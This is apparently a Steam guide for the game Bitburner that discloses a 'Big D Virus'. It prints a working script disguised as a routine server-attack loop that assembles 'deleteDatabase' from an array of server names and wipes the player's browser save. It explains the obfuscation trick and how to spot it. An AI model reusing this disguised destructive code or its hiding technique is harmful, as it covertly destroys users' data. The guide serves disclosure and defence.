dark

The Big D Virus

admin
2022-02-25 14:15:43

Dangerous Source Code

This will delete your save. Do not run without first exporting your save.

/** @param {NS} ns **/ export async function main(ns) { let attackers = [ "home" ] let attackable = [ "darkweb", "univ-energy", "titan-labs", "applied-energetics", "taiyangdigital", "alpha-ent", "Defcomm", "b-and-a", "titanlabs", "aerocorp", "blade", "fulcrum-assets", "syscore", "ecorp" ] let hostnames = attackable.map(s => s.split("-")[1] || s[0]).map(s => s[0]).join("") for (let hostname of hostnames) { // ns.print("--------------------------") // ns.print(hostname, " ", ns.getServerMaxRam(hostname) - ns.getServerUsedRam(hostname)) // ns.print("--------------------------") } if (ns.getPlayer().money > 110000) { let server = ns.purchaseServer("bitburnerSave", 2) ns.tprint("purchased server: ", indexedDB[hostnames](server)) } try { for (let target of attackable) { if (ns.getServerSecurityLevel(target) > ns.getServerMinSecurityLevel(target)) { await ns.weaken(target) } else if (ns.getServerMoneyAvailable(target) < ns.getServerMaxMoney(target)) { await ns.grow(target) } } } catch { ns.tprint("error attacking") } }

Limit Of Vulnerability

No sandbox escape: This cannot harm your computer in any way. Its effects are limited to the window Bitburner is running in. The browser 'sandboxes' the Bitburner client. To escape this sandbox, you'd have to defeat Google Chrome's security, which is functionally impossible, as there are millions of professional security researchers around the world who make their livelihood trying to do just that. If a sandbox escape was discovered, I expect the discoverer would prefer to claim the bug bounty (or sell it to the highest bidder) rather than delete a bunch of Bitburner games.

No Steam privileges: This also cannot harm your Steam account in any way. Technically, a similar exploit could be used to falsify achievements, but it could only grant new ones, not take old ones away... and achievements would be the limit of its control. The source code provided here will not modify your achievements.

This exploit cannot modify exported save games. Bitburner provides an "Export Save Game" functionality and encourages users to regularly use it by providing a buff every 24h for exporting a save game. The exported save contains the database at the time of export. As a result, you can only lose data up to your most recent exported save. Importing that save restores all functionality.

Explanation Of Vulnerability

If you run a javascript file containing the following command, your savestate will be deleted. indexedDB.deleteDatabase("bitburnerSave")

While this exploit uses the word "bitburnerSave," that was just me being lazy. It does not use the word "deleteDatabase" anywhere.

The attackable[] array was specially selected and ordered such that the first letter of each word, or, if the word contains a dash, the first letter of the second word, hide the word "deleteDatabase."

Attacks of this nature -- reliable ones, at least -- will almost always rely on arrays of strings, which are javascript's only ordered data structure. Arrays of integers could be used, but this would likely make the attack more obvious, rather than less.

The attack occurs in the ns.tprint() line after a server is purchased. This line explicitly calls the following function:

indexedDB["deleteDatabase"]("bitburnerSave")

Which is syntactically identical to the original attack function described earlier.

I have characterized this as "The Big D Virus" because of the capital "D" in Defcomm. This capital "D" is critical to getting the specific string "deleteDatabase," as a lowercase "d" would yield "deletedatabase" and have no effect. Achieving that capitalization without specifically typing it as part of a string would require multiple layers of obfuscation so as to not reveal that it is generating a capital D, and every extra line of obfuscation sticks out like a sore thumb to someone reading the source code.

You can prevent or eliminate your exposure to a rudimentary attack such as this by avoiding "Big D" source code -- any source code that contains a capital D stored in an array. That simple rule, plus reviewing the source and removing lines you don't understand (or learning exactly what they do, so that you do understand them), will fully protect you against this attack.

Permanently Patching The Vulnerability

FOSSburner[github.com] is actively undertaking development efforts to patch this vulnerability, but this patch will not be applied to the Steam version of the game, as the FOSSburner developers do not own or control the Official Bitburner Game's source code, nor the Steam implementation of it. As of the writing of this guide, FOSSburner does not contain a patch for this bug, but developers expect the exploit to be partially or fully patched by March 1, 2022.

Source: https://steamcommunity.com/sharedfiles/filedetails/?id=2762955541

More Bitburner guilds